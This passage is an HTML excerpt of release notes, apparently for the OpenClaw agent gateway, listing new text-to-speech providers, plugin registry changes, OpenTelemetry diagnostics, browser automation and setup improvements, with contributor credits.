<li>Voice replies get a full TTS upgrade: <code>/tts latest</code>, chat-scoped auto-TTS controls, personas, per-agent/per-account overrides, and new Azure Speech, Xiaomi, Local CLI, Inworld, Volcengine, and ElevenLabs v3 provider coverage. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/leonchui/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/leonchui">@leonchui</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zoujiejun/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zoujiejun">@zoujiejun</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/solar2ain/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/solar2ain">@solar2ain</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cshape/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cshape">@cshape</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xuruiray/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xuruiray">@xuruiray</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/itsuzef/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/itsuzef">@itsuzef</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/barronlroth/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/barronlroth">@barronlroth</a>.</li>
<li>Plugin startup and install paths move to the cold persisted registry, cutting broad manifest scans while making plugin update, repair, provider discovery, and install metadata more deterministic. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>OpenTelemetry coverage expands across model calls, token usage, tool loops, harness runs, exec processes, outbound delivery, context assembly, and memory pressure with bounded low-cardinality attributes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jlapenna/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jlapenna">@jlapenna</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lidang-Jiang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lidang-Jiang">@Lidang-Jiang</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oc-factus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oc-factus">@oc-factus</a>.</li>
<li>Browser automation gets safer tab URLs, iframe-aware role snapshots, CDP readiness tuning, headless one-shot launch, and deeper browser doctor probes for slow hosts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/beat843796/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/beat843796">@beat843796</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BenediktSchackenberg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BenediktSchackenberg">@BenediktSchackenberg</a>.</li>
<li>Control UI and setup flows add PWA/Web Push support, Crestodian first-run repair, TUI setup, context mode selection, and a shorter startup greeting. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eduardocruz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eduardocruz">@eduardocruz</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SebTardif/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SebTardif">@SebTardif</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kevinlin-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kevinlin-openai">@kevinlin-openai</a>.</li>
<li>Install/update hardening covers Windows, macOS, Linux, Docker, bundled plugin runtime deps, Node service restarts, LaunchAgent token rotation, and mixed-version gateway verification. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kobevictor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kobevictor">@Kobevictor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/igormf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/igormf">@igormf</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/abhinas90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/abhinas90">@abhinas90</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jsompis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jsompis">@jsompis</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Solvely-Colin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Solvely-Colin">@Solvely-Colin</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gucasbrg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gucasbrg">@gucasbrg</a>.</li>
</ul>
<h3>Changes</h3>
<ul>
<li>TTS/WhatsApp: add <code>/tts latest</code> read-aloud support with duplicate suppression and <code>/tts chat on|off|default</code> session-scoped auto-TTS overrides, completing the on-demand voice-note UX for current-chat replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4256179902" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66032" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66032/hovercard" href="https://github.com/openclaw/openclaw/issues/66032">#66032</a>.</li>
<li>TTS/channels: resolve channel and account TTS overrides generically, enabling Feishu and QQBot accounts to deep-merge <code>channels.&lt;channel&gt;.accounts.&lt;id&gt;.tts</code> over global and per-agent TTS config. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sahilsatralkar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sahilsatralkar">@sahilsatralkar</a>.</li>
<li>TTS/agents: allow <code>agents.list[].tts</code> to override global <code>messages.tts</code> for per-agent voices, and make <code>/tts audio</code>, <code>/tts status</code>, and the <code>tts</code> agent tool honor the active voice/provider override while keeping shared provider credentials and preferences in the existing TTS config surface.</li>
<li>Providers/Azure Speech: add Azure Speech as a bundled TTS provider with Speech-resource auth, voice listing, SSML escaping, native Ogg/Opus voice-note output, and telephony output. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4113089889" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51776" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/51776/hovercard" href="https://github.com/openclaw/openclaw/pull/51776">#51776</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/leonchui/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/leonchui">@leonchui</a>.</li>
<li>Google Meet: add calendar-backed attendance export workflows, export manifests, dry-run previews, and tool parity for meeting records.</li>
<li>Control UI: add PWA install support and Web Push notifications for Gateway chat. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4068543152" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44590" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/44590/hovercard" href="https://github.com/openclaw/openclaw/pull/44590">#44590</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eduardocruz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eduardocruz">@eduardocruz</a>.</li>
<li>Browser automation: add safe tab URLs in agent responses plus a CDP-native role snapshot fallback with iframe-aware refs, cursor-clickable detection, target attach preparation, and <code>openclaw browser doctor --deep</code> live snapshot probing.</li>
<li>CLI/image generation: expose generic <code>--background</code> on <code>openclaw infer image generate</code> and <code>openclaw infer image edit</code>, keep <code>--openai-background</code> as an OpenAI alias, and let fal image generation honor <code>--output-format png|jpeg</code>.</li>
<li>Browser/config: allow local managed Chrome launch discovery and post-launch CDP readiness timeouts to be raised for slower hosts such as Raspberry Pi. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4264662087" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66803" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66803/hovercard" href="https://github.com/openclaw/openclaw/issues/66803">#66803</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/beat843796/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/beat843796">@beat843796</a>.</li>
<li>Discord: allow <code>channels.discord.voice.model</code> to override the LLM used for voice channel responses while keeping STT and TTS on their existing media settings. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4240023484" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64368" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/64368/hovercard" href="https://github.com/openclaw/openclaw/pull/64368">#64368</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mrdavey/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mrdavey">@mrdavey</a>.</li>
<li>Browser/CLI: add <code>openclaw browser start --headless</code> as a one-shot local managed browser launch override without rewriting persisted browser config. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BenediktSchackenberg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BenediktSchackenberg">@BenediktSchackenberg</a>.</li>
<li>CLI/Crestodian/TUI: add the first-run setup helper, local planner fallback, full-TUI interactive Crestodian, startup progress indicators, context mode selector, and a shorter startup greeting. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329002099" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71720" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71720/hovercard" href="https://github.com/openclaw/openclaw/pull/71720">#71720</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329176612" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71760" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71760/hovercard" href="https://github.com/openclaw/openclaw/pull/71760">#71760</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SebTardif/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SebTardif">@SebTardif</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kevinlin-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kevinlin-openai">@kevinlin-openai</a>.</li>
<li>Plugins: migrate the local plugin registry automatically during package install/update, keeping install metadata in the plugin index while indexing existing plugin manifests for the new cold registry path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/doctor: make <code>openclaw doctor --fix</code> refresh the plugin index and cold registry index when needed without treating plugin install records as authored config. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/hooks: add before-agent-finalize hooks, cron <code>jobId</code> hook context, bounded native permission fingerprints, and Codex MCP hook relay support. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329196089" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71765" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71765/hovercard" href="https://github.com/openclaw/openclaw/pull/71765">#71765</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329172189" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71758" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71758/hovercard" href="https://github.com/openclaw/openclaw/pull/71758">#71758</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328919273" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71707" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71707/hovercard" href="https://github.com/openclaw/openclaw/pull/71707">#71707</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Plugins/tokenjuice: bump the bundled tokenjuice runtime to 0.6.3. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: align model-call GenAI span attributes with OpenTelemetry stability opt-in semantics, keeping legacy <code>gen_ai.system</code> by default while emitting <code>gen_ai.provider.name</code> under <code>OTEL_SEMCONV_STABILITY_OPT_IN=gen_ai_latest_experimental</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: support signal-specific OTLP endpoint overrides for traces, metrics, and logs via config or standard OTEL environment variables. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: emit bounded telemetry exporter health diagnostics for startup and log-export failures without exporting raw error text. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: export agent harness lifecycle telemetry as bounded <code>openclaw.harness.run</code> spans and <code>openclaw.harness.duration_ms</code> metrics so QA-lab, Codex, and future harnesses share one trace shape. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/trace: propagate W3C <code>traceparent</code> headers from trusted model-call trace context to provider transports while replacing caller-supplied traceparent values. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/Prometheus: add a bundled <code>diagnostics-prometheus</code> plugin with a protected gateway scrape route for low-cardinality diagnostics metrics. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/CLI: add <code>openclaw plugins registry</code> for explicit persisted-registry inspection and <code>--refresh</code> repair without making normal startup rescan plugin locations. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/CLI: make <code>openclaw plugins list</code> read the cold persisted registry snapshot by default, leaving module-aware diagnostics to <code>plugins doctor</code> and <code>plugins inspect</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/startup: move gateway startup plugin planning onto the versioned cold registry index, with postinstall repair for older registry files that predate startup metadata. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/startup: normalize startup and provider plugin enablement through registry aliases so boot paths do not need the legacy manifest alias scan. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Providers/plugins: resolve provider ownership, provider discovery scopes, and catalog-hook provider ids from the cold plugin registry instead of rescanning manifests on those paths. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/registry: keep installed plugin index records focused on install/state/load paths and resolve plugin capabilities from manifests scoped to indexed plugins. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/registry: route cold manifest and capability lookups through the installed plugin index so setup, channels, config, secrets, doctor, and provider metadata paths avoid broad plugin-root scans before runtime execution. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/models: speed up <code>models list --all --provider &lt;id&gt;</code> for static manifest-backed providers by loading catalog rows through the installed plugin index instead of broad manifest scans or runtime suppression hooks. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/models: use OpenClaw Provider Index preview rows as the final cold fallback for installable providers, while keeping user config, installed manifests, and refreshed cache rows above provider-index metadata. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Providers/plugins: keep onboarding and auth-choice setup lists on cold manifest/install metadata and add Provider Index install metadata for not-yet-installed provider plugins. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Providers/plugins: keep provider setup guidance and configure auth imports on cold manifest metadata, with a regression guard against static provider-runtime imports on setup/configure list paths. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>CLI/capabilities: keep capability command registration from importing the models auth runtime until <code>model auth login</code> actually runs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>CLI/configure: keep web-search configure prompts on cold plugin registry metadata until the user chooses managed search setup. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/chat commands: refresh the persisted plugin registry after <code>/plugins enable</code> and <code>/plugins disable</code>, matching the CLI mutation path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/compat: mark <code>OPENCLAW_DISABLE_PERSISTED_PLUGIN_REGISTRY</code> as a deprecated break-glass switch and point operators at registry repair instead. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/compat: expand the central compatibility registry with dated owners, replacements, and maximum three-month removal targets for legacy SDK, manifest, setup, registry-migration, and agent-runtime surfaces. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/registry: ignore stale persisted registry reads when plugin policy no longer matches current config, and stamp generated registry files with a do-not-edit warning. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Config/plugins: keep plugin command-alias validation on cold manifest metadata instead of importing the runtime alias resolver. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Security/plugins: keep web-search credential presence checks on cold config, env, and manifest metadata instead of importing web-search provider runtime. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: surface provider request identifiers as bounded hashes on model-call diagnostics and span events, without exporting raw request IDs or metric labels. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lidang-Jiang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lidang-Jiang">@Lidang-Jiang</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/diagnostics: add metadata-only <code>model_call_started</code> and <code>model_call_ended</code> hooks for provider/model call telemetry without exposing prompts, responses, headers, request bodies, or raw provider request IDs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: emit bounded context assembly diagnostics and export <code>openclaw.context.assembled</code> spans with prompt/history sizes but no prompt, history, response, or session-key content. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: export existing tool-loop diagnostics as <code>openclaw.tool.loop</code> counters and spans without loop messages, session identifiers, params, or tool output. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: export diagnostic memory samples and pressure as bounded memory histograms, counters, and pressure spans to help spot leak regressions without session or payload data. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: add the GenAI <code>gen_ai.client.token.usage</code> histogram for input/output model usage while keeping session identifiers and aggregate cache counters out of the semantic metric. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: add a bounded <code>openclaw.agent</code> label to OpenClaw token metrics so per-agent Grafana dashboards can group usage without exporting session identifiers. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oc-factus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oc-factus">@oc-factus</a>.</li>
<li>Plugins/install: consolidate managed plugin install metadata into the state-managed plugin index at <code>plugins/installs.json</code>, replacing the temporary <code>plugins/installed-index.json</code> path and removing <code>plugins.installs</code> as an authored config surface. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Diagnostics/OTEL: add the GenAI <code>gen_ai.client.operation.duration</code> histogram for model-call latency in seconds with bounded provider/model/API and error attributes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: add GenAI usage token attributes to model-usage spans, including cache read/write input token counts without session identifiers or prompt/response content. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: include bounded GenAI operation, provider, and request-model attributes on model-usage spans so token usage remains self-describing without diagnostic identifiers. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: keep model-usage span GenAI provider attributes aligned with the existing semantic-convention opt-in policy, using legacy <code>gen_ai.system</code> unless latest experimental GenAI conventions are enabled. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: keep <code>gen_ai.request.model</code> present on GenAI token usage metrics with a bounded <code>unknown</code> fallback when model usage events do not include a model. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Docs/OTEL: document the GenAI token and model-call duration metrics, model-usage span attributes, and <code>OTEL_SEMCONV_STABILITY_OPT_IN=gen_ai_latest_experimental</code> provider-attribute behavior. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Docs: refresh the MCP, model provider, doctor, troubleshooting, BlueBubbles, media generation, TTS, subagents, skills, cron/tasks, exec approvals, and voice-call guides with structured Steps, Tabs, and Accordion content.</li>
